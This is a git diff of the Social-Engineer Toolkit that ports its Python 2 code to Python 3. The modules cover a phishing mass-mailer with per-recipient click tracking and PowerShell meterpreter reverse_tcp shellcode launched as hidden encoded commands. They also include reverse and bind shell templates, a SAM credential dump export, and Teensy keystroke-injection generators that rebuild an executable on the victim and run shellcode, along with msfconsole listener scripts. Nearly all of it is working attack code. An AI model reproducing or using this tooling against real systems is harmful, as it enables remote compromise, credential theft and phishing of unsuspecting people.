# part of the URL. When we check the users, they can be coorelated
# back to the individual user when they click the link.
# track email is pulled dynamically from the config as TRACK_EMAIL_ADDRESSES
# track email is pulled dynamically from the config as
# TRACK_EMAIL_ADDRESSES
if track_email.lower() == "on":
print "You have specified to track user email accounts when they are sent. In"
print "order for this to work, you will need to specify the URL within the body"
print "of the email and where you would like to inject the base64 encoded name."
print "\nWhen a user clicks on the link, the URL Will post back to SET and track"
print "each of the users clicks and who the user was. As an example, say my SET"
print "website is hosted at http://www.trustedsec.com/index.php and I want to track users."
print "I would type below " + bcolors.BOLD + "http://www.trustedsec.com/index.php?INSERTUSERHERE" + bcolors.ENDC + ". Note that in"
print "order for SET to work, you will need to specify index.php?INSERTUSERHERE. That is the"
print "keyword that SET uses in order to replace the base name with the URL."
print "\nInsert the FULL url and the " + bcolors.BOLD + "INSERTUSERHERE" + bcolors.ENDC + "on where you want to insert the base64 name.\n\nNOTE: You must have a index.php and a ? mark seperating the user. YOU MUST USE PHP!"
print "\nNote that the actual URL does NOT need to contain index.php but has to be named that for the php code in Apache to work."
print_warning("IMPORTANT: When finished, type END (all capital) then hit {return} on a new line.")
body=raw_input(setprompt(["1"], "Enter the body of the message, type END (capitals) when finished"))
print("You have specified to track user email accounts when they are sent. In")
print("order for this to work, you will need to specify the URL within the body")
print("of the email and where you would like to inject the base64 encoded name.")
print("\nWhen a user clicks on the link, the URL Will post back to SET and track")
print("each of the users clicks and who the user was. As an example, say my SET")
print("website is hosted at http://www.trustedsec.com/index.php and I want to track users.")
print("I would type below " + bcolors.BOLD + "http://www.trustedsec.com/index.php?INSERTUSERHERE" + bcolors.ENDC + ". Note that in")
print("order for SET to work, you will need to specify index.php?INSERTUSERHERE. That is the")
print("keyword that SET uses in order to replace the base name with the URL.")
print("\nInsert the FULL url and the " + bcolors.BOLD + "INSERTUSERHERE" + bcolors.ENDC + "on where you want to insert the base64 name.\n\nNOTE: You must have a index.php and a ? mark seperating the user. YOU MUST USE PHP!")
print("\nNote that the actual URL does NOT need to contain index.php but has to be named that for the php code in Apache to work.")
print_warning(
"IMPORTANT: When finished, type END (all capital) then hit {return} on a new line.")
body = input(setprompt(
["1"], "Enter the body of the message, type END (capitals) when finished"))
# loop through until they are finished with the body of the subject line
# loop through until they are finished with the body of the subject
# line
while body != 'exit':
try:
body+=("\n")
body_1 = raw_input("Next line of the body: ")
body += ("\n")
body_1 = input("Next line of the body: ")
if body_1 == "END":
break
else:
@ -230,30 +250,35 @@ if option1 != "99":
except KeyboardInterrupt:
break
# if we are tracking emails, this is some cleanup and detection to see if they entered .html instead or didn't specify insertuserhere
# if we are tracking emails, this is some cleanup and detection to see
# if they entered .html instead or didn't specify insertuserhere
if track_email.lower() == "on":
# here we replace url with .php if they made a mistake
body = body.replace(".html", ".php")
if not "?INSERTUSERHERE" in body:
print_error("You have track email to on however did not specify ?INSERTUSERHERE.")
print_error("Tracking of users will not work and is disabled. Please re-read the instructions.")
pause = raw_input("Press {" + bcolors.BOLD + "return" + bcolors.ENDC + "} to continue.")
print_error(
"You have track email to on however did not specify ?INSERTUSERHERE.")
print_error(
"Tracking of users will not work and is disabled. Please re-read the instructions.")
pause = input(
"Press {" + bcolors.BOLD + "return" + bcolors.ENDC + "} to continue.")
# except KeyboardInterrupts (control-c) and pass through.
except KeyboardInterrupt:
pass
def mail(to, subject, prioflag1, prioflag2, text):
msg = MIMEMultipart()
msg['From'] = str(Header(from_displayname, 'UTF-8').encode() + ' <' + from_address + '> ')
msg['From'] = str(
Header(from_displayname, 'UTF-8').encode() + ' <' + from_address + '> ')
msg['To'] = to
msg['X-Priority'] = prioflag1
msg['X-MSMail-Priority'] = prioflag2
msg['Subject'] = Header(subject, 'UTF-8').encode()
body_type=MIMEText(text, "%s" % (message_flag), 'UTF-8')
body_type = MIMEText(text, "%s" % (message_flag), 'UTF-8')
msg.attach(body_type)
mailServer = smtplib.SMTP(smtp, port)
@ -271,7 +296,8 @@ def mail(to, subject, prioflag1, prioflag2, text):
pass
mailServer.ehlo()
else: mailServer.ehlo()
else:
mailServer.ehlo()
try:
if provideruser != "" or pwd != "":
@ -286,8 +312,9 @@ def mail(to, subject, prioflag1, prioflag2, text):
mailServer.docmd(base64.b64encode(pwd), "")
# except exceptions and print incorrect passowrd
except Exception, e:
print_warning("It appears your password was incorrect.\nPrinting response: "+(str(e)))
except Exception as e:
print_warning(
"It appears your password was incorrect.\nPrinting response: " + (str(e)))
return_continue()
if sendmail == 1:
@ -297,14 +324,16 @@ def mail(to, subject, prioflag1, prioflag2, text):
if option1 == '1':
# re-assign body to temporary variable to not overwrite original body
body_new = body
## if we specify to track users, this will replace the INSERTUSERHERE with the "TO" field.
# if we specify to track users, this will replace the INSERTUSERHERE with
# the "TO" field.
if track_email.lower() == "on":
body_new = body_new.replace("INSERTUSERHERE", base64.b64encode(to))
# call the function to send email
try:
mail(to,subject,prioflag1,prioflag2,body_new)
mail(to, subject, prioflag1, prioflag2, body_new)
except socket.error:
print_error("Unable to establish a connection with the SMTP server. Try again.")
print_error(
"Unable to establish a connection with the SMTP server. Try again.")
sys.exit()
except KeyboardInterrupt:
print_error("Control-C detected, exiting out of SET.")
@ -315,22 +344,24 @@ if option1 == '1':
# if we specified the mass mailer for multiple users
if option1 == '2':
email_num=0
fileopen=file(filepath, "r").readlines()
email_num = 0
fileopen = open(filepath, "r").readlines()
for line in fileopen:
to = line.rstrip()
# re-assign body to temporary variable to not overwrite original body
body_new = body
## if we specify to track users, this will replace the INSERTUSERHERE with the "TO" field.
# if we specify to track users, this will replace the INSERTUSERHERE
# with the "TO" field.
if track_email.lower() == "on":
body_new = body_new.replace("INSERTUSERHERE", base64.b64encode(to))
# send the actual email
time_delay = check_config("TIME_DELAY_EMAIL=").lower()
time.sleep(int(time_delay))
mail(to,subject,prioflag1,prioflag2,body_new)
email_num=email_num+1
mail(to, subject, prioflag1, prioflag2, body_new)
email_num = email_num + 1
# simply print the statement
print_status("Sent e-mail number: " + (str(email_num)) + " to address: " + to)
print_status("Sent e-mail number: " +
(str(email_num)) + " to address: " + to)
if option1 != "99":
# finish up here

83
src/powershell/powershell.py
View file

@ -10,9 +10,9 @@ from src.core.menu import text
me = mod_name()
debug_msg(me, "printing 'text.powershell menu'",5)
debug_msg(me, "printing 'text.powershell menu'", 5)
show_powershell_menu = create_menu(text.powershell_text, text.powershell_menu)
powershell_menu_choice = raw_input(setprompt(["29"], ""))
powershell_menu_choice = input(setprompt(["29"], ""))
if powershell_menu_choice != "99":
# specify ipaddress of reverse listener
@ -21,70 +21,86 @@ if powershell_menu_choice != "99":
# if we select alphanumeric shellcode
if powershell_menu_choice == "1":
port = raw_input(setprompt(["29"], "Enter the port for the reverse [443]"))
if port == "": port = "443"
port = input(
setprompt(["29"], "Enter the port for the reverse [443]"))
if port == "":
port = "443"
update_options("PORT=" + port)
update_options("POWERSHELL_SOLO=ON")
print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
print_status(
"Prepping the payload for delivery and injecting alphanumeric shellcode...")
filewrite = file(setdir + "/payload_options.shellcode", "w")
filewrite = open(setdir + "/payload_options.shellcode", "w")
filewrite.write("windows/meterpreter/reverse_tcp " + port + ",")
filewrite.close()
try: reload(src.payloads.powershell.prep)
except: import src.payloads.powershell.prep
try:
reload(src.payloads.powershell.prep)
except:
import src.payloads.powershell.prep
# create the directory if it does not exist
if not os.path.isdir(setdir + "/reports/powershell"):
os.makedirs(setdir + "/reports/powershell")
# here we format everything for us
x86 = file(setdir + "/x86.powershell", "r")
x86 = open(setdir + "/x86.powershell", "r")
x86 = x86.read()
x86 = "powershell -nop -win hidden -noni -enc " + x86
print_status("If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
filewrite = file(setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
print_status(
"If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
filewrite = open(
setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
filewrite.write(x86)
filewrite.close()
choice = yesno_prompt("0","Do you want to start the listener now [yes/no]: ")
choice = yesno_prompt(
"0", "Do you want to start the listener now [yes/no]: ")
if choice == 'NO':
pass
# if we want to start the listener
if choice == 'YES':
filewrite = file(setdir + "/reports/powershell/powershell.rc", "w")
filewrite.write("use multi/handler\nset payload windows/meterpreter/reverse_tcp\nset LPORT %s\nset LHOST 0.0.0.0\nset ExitOnSession false\nexploit -j" % (port))
filewrite = open(setdir + "/reports/powershell/powershell.rc", "w")
filewrite.write(
"use multi/handler\nset payload windows/meterpreter/reverse_tcp\nset LPORT %s\nset LHOST 0.0.0.0\nset ExitOnSession false\nexploit -j" % (port))
filewrite.close()
msf_path = meta_path()
subprocess.Popen("%smsfconsole -r %s/reports/powershell/powershell.rc" % (msf_path, setdir), shell=True).wait()
subprocess.Popen("%smsfconsole -r %s/reports/powershell/powershell.rc" %
(msf_path, setdir), shell=True).wait()
print_status("Powershell files can be found under %s/reports/powershell/" % (setdir))
print_status(
"Powershell files can be found under %s/reports/powershell/" % (setdir))
return_continue()
# if we select powershell reverse shell
if powershell_menu_choice == "2":
# prompt for IP address and port
port = raw_input(setprompt(["29"], "Enter the port for listener [443]"))
port = input(
setprompt(["29"], "Enter the port for listener [443]"))
# default to 443
if port == "": port = "443"
if port == "":
port = "443"
# open the reverse shell up
print_status("Rewriting the powershell reverse shell with options")
fileopen = file("src/powershell/reverse.powershell", "r")
fileopen = open("src/powershell/reverse.powershell", "r")
data = fileopen.read()
data = data.replace("IPADDRHERE", ipaddr)
data = data.replace("PORTHERE", port)
print_status("Exporting the powershell stuff to %s/reports/powershell" % (setdir))
print_status(
"Exporting the powershell stuff to %s/reports/powershell" % (setdir))
# create the directory if it does not exist
if not os.path.isdir(setdir + "/reports/powershell"):
os.makedirs(setdir + "/reports/powershell")
filewrite = file(setdir + "/reports/powershell/powershell.reverse.txt", "w")
filewrite = open(
setdir + "/reports/powershell/powershell.reverse.txt", "w")
filewrite.write(data)
filewrite.close()
choice = yesno_prompt("0","Do you want to start a listener [yes/no]")
choice = yesno_prompt("0", "Do you want to start a listener [yes/no]")
if choice == "NO":
print_status("Have netcat or standard socket listener on port %s" % (port))
print_status(
"Have netcat or standard socket listener on port %s" % (port))
if choice == "YES":
socket_listener(port)
@ -93,22 +109,24 @@ if powershell_menu_choice != "99":
# if we select powershell bind shell
if powershell_menu_choice == "3":
port = raw_input(setprompt(["29"], "Enter the port for listener [443]"))
port = input(
setprompt(["29"], "Enter the port for listener [443]"))
# open file
fileopen = file("src/powershell/bind.powershell", "r")
fileopen = open("src/powershell/bind.powershell", "r")
data = fileopen.read()
data = data.replace("PORTHERE", port)
# create the directory if it does not exist
if not os.path.isdir(setdir + "/reports/powershell"):
os.makedirs(setdir + "/reports/powershell")
filewrite = file(setdir + "/reports/powershell/powershell.bind.txt", "w")
filewrite = open(
setdir + "/reports/powershell/powershell.bind.txt", "w")
filewrite.write(data)
filewrite.close()
print_status("The powershell program has been exported to %s/reports/powershell/" % (setdir))
print_status(
"The powershell program has been exported to %s/reports/powershell/" % (setdir))
return_continue()
# if we select powershell powerdump SAM dump
if powershell_menu_choice == "4":
@ -117,7 +135,10 @@ if powershell_menu_choice != "99":
os.makedirs(setdir + "/reports/powershell")
# copy file
if os.path.isfile("src/powershell/powerdump.encoded"):
shutil.copyfile("src/powershell/powerdump.encoded", setdir + "/reports/powershell/powerdump.encoded.txt")
print_status("The powershell program has been exported to %s/reports/powershell/" % (setdir))
print_status("Note with PowerDump -- You MUST be running as SYSTEM when executing.")
shutil.copyfile("src/powershell/powerdump.encoded",
setdir + "/reports/powershell/powerdump.encoded.txt")
print_status(
"The powershell program has been exported to %s/reports/powershell/" % (setdir))
print_status(
"Note with PowerDump -- You MUST be running as SYSTEM when executing.")
return_continue()

2028
src/qrcode/qrcode.py
View file

File diff suppressed because it is too large Load diff

8
src/qrcode/qrgenerator.py
View file

@ -3,6 +3,8 @@ from src.core.setcore import *
import os
# generate the qrcode and save it definition
def gen_qrcode(url):
# generate the qrcode
qr = QRCode(5, QRErrorCorrectLevel.L)
@ -10,8 +12,10 @@ def gen_qrcode(url):
qr.make()
im = qr.makeImage()
time.sleep(1)
if os.path.isfile(setdir + "/reports/qrcode_attack.png"): os.remove(setdir + "/reports/qrcode_attack.png")
if os.path.isfile(setdir + "/reports/qrcode_attack.png"):
os.remove(setdir + "/reports/qrcode_attack.png")
# save the image out
im.save(setdir + "/reports/qrcode_attack.png", format='png')
# print that its been successful
print_status("QRCode has been generated under %s/reports/qrcode_attack.png!" % (setdir))
print_status(
"QRCode has been generated under %s/reports/qrcode_attack.png!" % (setdir))

108
src/teensy/binary2teensy.py
View file

@ -1,20 +1,27 @@
#!/usr/bin/python
import binascii,base64,sys,os,random,string,subprocess,socket
import binascii
import base64
import sys
import os
import random
import string
import subprocess
import socket
from src.core.setcore import *
from src.core.dictionaries import *
from src.core.menu.text import *
################################################################################################
##########################################################################
#
# BSIDES LV EXE to Teensy Creator
#
# by Josh Kelley (@winfang98)
# Dave Kennedy (@hackingdave)
#
################################################################################################
##########################################################################
################################################################################################
################################################################################################
##########################################################################
##########################################################################
#
# grab the interface ip address
@ -51,7 +58,7 @@ shell_exec = "4d5a90000300000004000000ffff0000b800000000000000400000000000000000
#########################################
# print main stuff for the application
print """
print("""
********************************************************************
BSIDES Las Vegas ---- EXE to Teensy Creator
********************************************************************
@ -63,10 +70,12 @@ place it onto a victim machine through hex to binary conversion via powershell.
After the conversion takes place, Alphanumeric shellcode will then be injected
straight into memory and the stager created and shot back to you.
"""
""")
# if we dont detect metasploit
if not os.path.isfile(msf_path): sys.exit("\n[!] Your no gangster... Metasploit not detected, check set_config.\n")
if not os.path.isfile(msf_path):
sys.exit(
"\n[!] Your no gangster... Metasploit not detected, check set_config.\n")
# if we hit here we are good since msfvenom is installed
###################################################
@ -74,30 +83,33 @@ if not os.path.isfile(msf_path): sys.exit("\n[!] Your no gangster... Metasploit
###################################################
show_payload_menu2 = create_menu(payload_menu_2_text, payload_menu_2)
payload=(raw_input(setprompt(["14"], "")))
payload = (input(setprompt(["14"], "")))
if payload == "exit" :
if payload == "exit":
exit_set()
# if its default then select meterpreter
if payload == "" : payload="2"
if payload == "":
payload = "2"
# assign the right payload
payload=ms_payload(payload)
payload = ms_payload(payload)
# if we're downloading and executing a file
url = ""
if payload == "windows/download_exec":
url = raw_input(setprompt(["6"], "The URL with the payload to download and execute"))
url = input(
setprompt(["6"], "The URL with the payload to download and execute"))
url = "set URL " + url
# try except for Keyboard Interrupts
try:
# grab port number
while 1:
port = raw_input(setprompt(["6"], "Port to listen on [443]"))
port = input(setprompt(["6"], "Port to listen on [443]"))
# assign port if enter is specified
if port == "": port = 443
if port == "":
port = 443
try:
# try to grab integer port
port = int(port)
@ -110,35 +122,37 @@ try:
# if we bomb out then loop through again
except:
print " [!] Not a valid port number, try again."
print(" [!] Not a valid port number, try again.")
# pass through
pass
# except keyboardintterupts here
except KeyboardInterrupt:
print """
print("""
.-. .-. . . .-. .-. .-. .-. .-. . . .-. .-. .-.
|.. |-| |\| |.. `-. | |- |( |\/| | | | )|-
`-' ` ' ' ` `-' `-' ' `-' ' ' ' ` `-' `-' `-'
disabled.\n"""
disabled.\n""")
sys.exit("\n[!] Control-C detected. Bombing out. Later Gangster...\n\n")
print " [*] Generating alpha_mixed shellcode to be injected after shellexec has been deployed on victim..."
print(" [*] Generating alpha_mixed shellcode to be injected after shellexec has been deployed on victim...")
# grab msfvenom alphanumeric shellcode to be inserted into shellexec
proc = subprocess.Popen("%smsfvenom -p %s EXITFUNC=thread LHOST=%s LPORT=%s %s --format raw -e x86/alpha_mixed BufferRegister=EAX" % (meta_path(),payload,ipaddr,port,url), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
proc = subprocess.Popen("%smsfvenom -p %s EXITFUNC=thread LHOST=%s LPORT=%s %s --format raw -e x86/alpha_mixed BufferRegister=EAX" %
(meta_path(), payload, ipaddr, port, url), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
# read in stdout which will be our alphanumeric shellcode
alpha_payload = proc.stdout.read()
# generate a random filename this is going to be needed to read 150 bytes in at a time
random_filename = generate_random_string(10,15)
# generate a random filename this is going to be needed to read 150 bytes
# in at a time
random_filename = generate_random_string(10, 15)
# prep a file to write
filewrite = file(random_filename, "wb")
filewrite = open(random_filename, "wb")
# write the hex to random file
filewrite.write(shell_exec)
# close it
filewrite.close()
# open up the random file
fileopen=file(random_filename, "r")
fileopen = open(random_filename, "r")
# base counter will be used for the prog_char RevShell_counter
counter = 0
# space to write out per line in the teensy pde file
@ -148,15 +162,17 @@ rev_counter = 0
# here we begin the code
output_variable = "/* Teensy Hex to File Created by Josh Kelley (winfang) and Dave Kennedy (ReL1K)*/\n#include <avr/pgmspace.h>\n"
# powershell command here, needs to be unicoded then base64 in order to use encodedcommand
powershell_command = unicode("$s=gc \"$HOME\\AppData\\Local\\Temp\\%s\";$s=[string]::Join('',$s);$s=$s.Replace('`r',''); $s=$s.Replace('`n','');$b=new-object byte[] $($s.Length/2);0..$($b.Length-1)|%%{$b[$_]=[Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes(\"$HOME\\AppData\\Local\\Temp\\%s.exe\",$b)" % (random_filename,random_filename))
# powershell command here, needs to be unicoded then base64 in order to
# use encodedcommand
powershell_command = str(
"$s=gc \"$HOME\\AppData\\Local\\Temp\\%s\";$s=[string]::Join('',$s);$s=$s.Replace('`r',''); $s=$s.Replace('`n','');$b=new-object byte[] $($s.Length/2);0..$($b.Length-1)|%%{$b[$_]=[Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes(\"$HOME\\AppData\\Local\\Temp\\%s.exe\",$b)" % (random_filename, random_filename))
########################################################################################################################################################################################################
##########################################################################
#
# there is an odd bug with python unicode, traditional unicode inserts a null byte after each character typically.. python does not so the encodedcommand becomes corrupt
# in order to get around this a null byte is pushed to each string value to fix this and make the encodedcommand work properly
#
########################################################################################################################################################################################################
##########################################################################
# blank command will store our fixed unicode variable
blank_command = ""
@ -175,31 +191,33 @@ while 1:
# read 150 bytes in at a time
reading_hex = fileopen.read(space).rstrip()
# if its blank then break out of loop
if reading_hex == "": break
if reading_hex == "":
break
# write out counter and hex
output_variable += 'prog_char RevShell_%s[] PROGMEM = "%s";\n' % (counter,reading_hex)
output_variable += 'prog_char RevShell_%s[] PROGMEM = "%s";\n' % (
counter, reading_hex)
# increase counter
counter = counter +1
counter = counter + 1
# write out the rest
output_variable += "PROGMEM const char *exploit[] = {\n"
# while rev_counter doesn't equal regular counter
while rev_counter != counter:
output_variable+="RevShell_%s" % rev_counter
output_variable += "RevShell_%s" % rev_counter
# incremenet counter
rev_counter = rev_counter + 1
if rev_counter == counter:
# if its equal that means we
# are done and need to append a };
output_variable+="};\n"
output_variable += "};\n"
if rev_counter != counter:
# if we don't equal, keep going
output_variable+=",\n"
output_variable += ",\n"
# vbs filename
vbs = generate_random_string(10,15) + ".vbs"
vbs = generate_random_string(10, 15) + ".vbs"
# .batch filename
bat = generate_random_string(10,15) + ".bat"
bat = generate_random_string(10, 15) + ".bat"
# write the rest of the teensy code
output_variable += ("""
@ -303,24 +321,26 @@ Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
}""" % (random_filename,random_filename,powershell_command,vbs,bat,vbs,vbs,random_filename,alpha_payload,bat,vbs))
}""" % (random_filename, random_filename, powershell_command, vbs, bat, vbs, vbs, random_filename, alpha_payload, bat, vbs))
# delete temporary file
subprocess.Popen("rm %s 1> /dev/null 2>/dev/null" % (random_filename), shell=True).wait()
print " [*] Binary to Teensy file exported as %s/reports/binary2teensy.pde" % (setdir)
subprocess.Popen("rm %s 1> /dev/null 2>/dev/null" %
(random_filename), shell=True).wait()
print(" [*] Binary to Teensy file exported as %s/reports/binary2teensy.pde" % (setdir))
# write the teensy.pde file out
filewrite = file(setdir + "/reports/binary2teensy.pde", "w")
filewrite = open(setdir + "/reports/binary2teensy.pde", "w")
# write the teensy.pde file out
filewrite.write(output_variable)
# close the file
filewrite.close()
print " [*] Generating a listener..."
print(" [*] Generating a listener...")
# create our metasploit answer file
filewrite = file(setdir + "/answer.txt", "w")
filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\n%s\nexploit -j" % (payload,ipaddr,port,url))
filewrite = open(setdir + "/answer.txt", "w")
filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\n%s\nexploit -j" %
(payload, ipaddr, port, url))
filewrite.close()
# spawn a multi/handler listener
subprocess.Popen("msfconsole -r %s/answer.txt" % (setdir), shell=True).wait()
print " [*] Housekeeping old files..."
print(" [*] Housekeeping old files...")
# if our answer file is still there (which it should be), then remove it
if os.path.isfile(setdir + "/answer.txt"):
# remove the old file, no longer used once we've exited

4
src/teensy/osx_sd2teensy.pde
View file

@ -67,13 +67,13 @@ void setup()
delay(1000);
Keyboard.println("import binascii");
delay(1000);
Keyboard.println("fileopen = file(\"/tmp/converts.txt\", \"rb\")");
Keyboard.println("fileopen = open(\"/tmp/converts.txt\", \"rb\")");
delay(1000);
Keyboard.println("data = fileopen.read()");
delay(1000);
Keyboard.println("data = binascii.unhexlify(data)");
delay(1000);
Keyboard.println("filewrite = file(\"/tmp/theconverted.txt\", \"w\")");
Keyboard.println("filewrite = open(\"/tmp/theconverted.txt\", \"w\")");
delay(1000);
Keyboard.println("filewrite.write(data)");
delay(1000);

60
src/teensy/powershell_shellcode.py
View file

@ -3,59 +3,61 @@ import pexpect
from src.core.setcore import *
import time
print """
print("""
The powershell - shellcode injection leverages powershell to send a meterpreter session straight into memory without ever touching disk.
This technique was introduced by Matthew Graeber (http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html)
"""
""")
# define standard metasploit payload
payload = "windows/meterpreter/reverse_tcp"
# create base metasploit payload to pass to powershell.prep
filewrite = file(setdir + "/metasploit.payload", "w")
filewrite = open(setdir + "/metasploit.payload", "w")
filewrite.write(payload)
filewrite.close()
ipaddr = raw_input("Enter the IP for the reverse: ")
port = raw_input("Enter the port for the reverse: ")
ipaddr = input("Enter the IP for the reverse: ")
port = input("Enter the port for the reverse: ")
shellcode = generate_powershell_alphanumeric_payload(payload,ipaddr,port, "")
filewrite = file(setdir + "/x86.powershell", "w")
shellcode = generate_powershell_alphanumeric_payload(payload, ipaddr, port, "")
filewrite = open(setdir + "/x86.powershell", "w")
filewrite.write(shellcode)
filewrite.close()
time.sleep(3)
fileopen = file(setdir + "/x86.powershell", "r")
fileopen = open(setdir + "/x86.powershell", "r")
# read in x amount of bytes
data_read = int(50)
output_variable = "#include <avr/pgmspace.h>\n"
output_variable = "#define __PROG_TYPES_COMPAT__\n#define PROGMEM\n#include <avr/pgmspace.h>\n"
counter = 0
while 1:
reading_encoded = fileopen.read(data_read).rstrip()
if reading_encoded == "": break
output_variable += 'prog_char RevShell_%s[] PROGMEM = "%s";\n' % (counter,reading_encoded)
if reading_encoded == "":
break
output_variable += "const char RevShell_%s[] PROGMEM = '%s';\n" % (
counter, reading_encoded)
counter = counter + 1
rev_counter = 0
output_variable += "PROGMEM const char *exploit[] = {\n"
output_variable += "const char exploit[] PROGMEM = {\n"
while rev_counter != counter:
output_variable+="RevShell_%s" % rev_counter
rev_counter = rev_counter +1
output_variable += "RevShell_%s" % rev_counter
rev_counter = rev_counter + 1
if rev_counter == counter:
output_variable+="};\n"
output_variable += "};\n"
if rev_counter != counter:
output_variable+=",\n"
output_variable += ",\n"
teensy = output_variable
# write the rest of the teensy code
teensy+=("""
teensy += ("""
char buffer[55];
int ledPin = 11;
@ -140,34 +142,36 @@ Keyboard.set_key1(0);
Keyboard.send_now();
}
""")
print "[*] Payload has been extracted. Copying file to %s/reports/teensy.pde" % (setdir)
print("[*] Payload has been extracted. Copying file to %s/reports/teensy.pde" % (setdir))
if not os.path.isdir(setdir + "/reports/"):
os.makedirs(setdir + "/reports/")
filewrite = file(setdir + "/reports/teensy.pde", "w")
filewrite = open(setdir + "/reports/teensy.pde", "w")
filewrite.write(teensy)
filewrite.close()
choice = yesno_prompt("0","Do you want to start a listener [yes/no]: ")
choice = yesno_prompt("0", "Do you want to start a listener [yes/no]: ")
if choice == "YES":
# Open the IPADDR file
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr=raw_input(setprompt(["6"], "IP address to connect back on"))
ipaddr = input(setprompt(["6"], "IP address to connect back on"))
update_options("IPADDR=" + ipaddr)
if check_options("PORT=") != 0:
port = check_options("PORT=")
else:
port = raw_input("Enter the port to connect back on: ")
port = input("Enter the port to connect back on: ")
filewrite = file(setdir + "/metasploit.answers", "w")
filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset AutoRunScript post/windows/manage/smart_migrate\nexploit -j" % (payload,ipaddr,port))
filewrite = open(setdir + "/metasploit.answers", "w")
filewrite.write(
"use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset AutoRunScript post/windows/manage/smart_migrate\nexploit -j" % (payload, ipaddr, port))
filewrite.close()
print "[*] Launching Metasploit...."
print("[*] Launching Metasploit....")
try:
child = pexpect.spawn("%smsfconsole -r %s/metasploit.answers\r\n\r\n" % (meta_path(),setdir))
child = pexpect.spawn(
"%smsfconsole -r %s/metasploit.answers\r\n\r\n" % (meta_path(), setdir))
child.interact()
except: pass
except:
pass

75
src/teensy/sd2teensy.py
View file

@ -1,23 +1,30 @@
#!/usr/bin/python
import binascii,base64,sys,os,random,string,subprocess,socket
import binascii
import base64
import sys
import os
import random
import string
import subprocess
import socket
from src.core.setcore import *
from src.core.dictionaries import *
from src.core.menu.text import *
################################################################################################
##########################################################################
#
# BSIDES LV SDCARD to Teensy Creator
#
# by Josh Kelley (@winfang98)
# Dave Kennedy (@hackingdave)
#
################################################################################################
##########################################################################
################################################################################################
################################################################################################
##########################################################################
##########################################################################
# print main stuff for the application
print """
print("""
********************************************************************
BSIDES Las Vegas ---- SDCard to Teensy Creator
********************************************************************
@ -31,48 +38,55 @@ file that this tool outputs in order to successfully complete the task.
It works by reading natively off the SDCard into a buffer space thats then
written out through the keyboard.
"""
""")
# if we hit here we are good since msfvenom is installed
print """
print("""
.-. .-. . . .-. .-. .-. .-. .-. . . .-. .-. .-.
|.. |-| |\| |.. `-. | |- |( |\/| | | | )|-
`-' ` ' ' ` `-' `-' ' `-' ' ' ' ` `-' `-' `-'
enabled.\n"""
enabled.\n""")
# grab the path and filename from user
path = raw_input(setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
path = input(
setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
if not os.path.isfile(path):
while 1:
print_warning("Filename not found, try again")
path = raw_input(setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
if os.path.isfile(path): break
path = input(
setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
if os.path.isfile(path):
break
print_warning("Note: This will only deliver the payload, you are in charge of creating the listener if applicable.")
print_status("Converting the executable to a hexadecimal form to be converted later...")
print_warning(
"Note: This will only deliver the payload, you are in charge of creating the listener if applicable.")
print_status(
"Converting the executable to a hexadecimal form to be converted later...")
fileopen = file(path, "rb")
fileopen = open(path, "rb")
data = fileopen.read()
data = binascii.hexlify(data)
filewrite = file("converts.txt", "w")
filewrite = open("converts.txt", "w")
filewrite.write(data)
print "[*] File converted successfully. It has been expored in the working directory under 'converts.txt'. Copy this one file to the teensy SDCard."
print("[*] File converted successfully. It has been expored in the working directory under 'converts.txt'. Copy this one file to the teensy SDCard.")
output_variable = "/*\nTeensy Hex to File SDCard Created by Josh Kelley (winfang) and Dave Kennedy (ReL1K)\nReading from a SD card. Based on code from: http://arduino.cc/en/Tutorial/DumpFile\n*/\n\n"
# this is used to write out the file
random_filename = generate_random_string(8,15) + ".txt"
random_filename = generate_random_string(8, 15) + ".txt"
# powershell command here, needs to be unicoded then base64 in order to use encodedcommand
powershell_command = unicode("$s=gc \"$HOME\\AppData\\Local\\Temp\\%s\";$s=[string]::Join('',$s);$s=$s.Replace('`r',''); $s=$s.Replace('`n','');$b=new-object byte[] $($s.Length/2);0..$($b.Length-1)|%%{$b[$_]=[Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes(\"$HOME\\AppData\\Local\\Temp\\%s.exe\",$b)" % (random_filename,random_filename))
# powershell command here, needs to be unicoded then base64 in order to
# use encodedcommand
powershell_command = str(
"$s=gc \"$HOME\\AppData\\Local\\Temp\\%s\";$s=[string]::Join('',$s);$s=$s.Replace('`r',''); $s=$s.Replace('`n','');$b=new-object byte[] $($s.Length/2);0..$($b.Length-1)|%%{$b[$_]=[Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes(\"$HOME\\AppData\\Local\\Temp\\%s.exe\",$b)" % (random_filename, random_filename))
########################################################################################################################################################################################################
##########################################################################
#
# there is an odd bug with python unicode, traditional unicode inserts a null byte after each character typically.. python does not so the encodedcommand becomes corrupt
# in order to get around this a null byte is pushed to each string value to fix this and make the encodedcommand work properly
#
########################################################################################################################################################################################################
##########################################################################
# blank command will store our fixed unicode variable
blank_command = ""
@ -87,9 +101,9 @@ powershell_command = blank_command
powershell_command = base64.b64encode(powershell_command)
# vbs filename
vbs = generate_random_string(10,15) + ".vbs"
vbs = generate_random_string(10, 15) + ".vbs"
# .batch filename
bat = generate_random_string(10,15) + ".bat"
bat = generate_random_string(10, 15) + ".bat"
# write the rest of the teensy code
output_variable += ("""
@ -210,17 +224,18 @@ Keyboard.send_now();
Keyboard.set_key1(0);
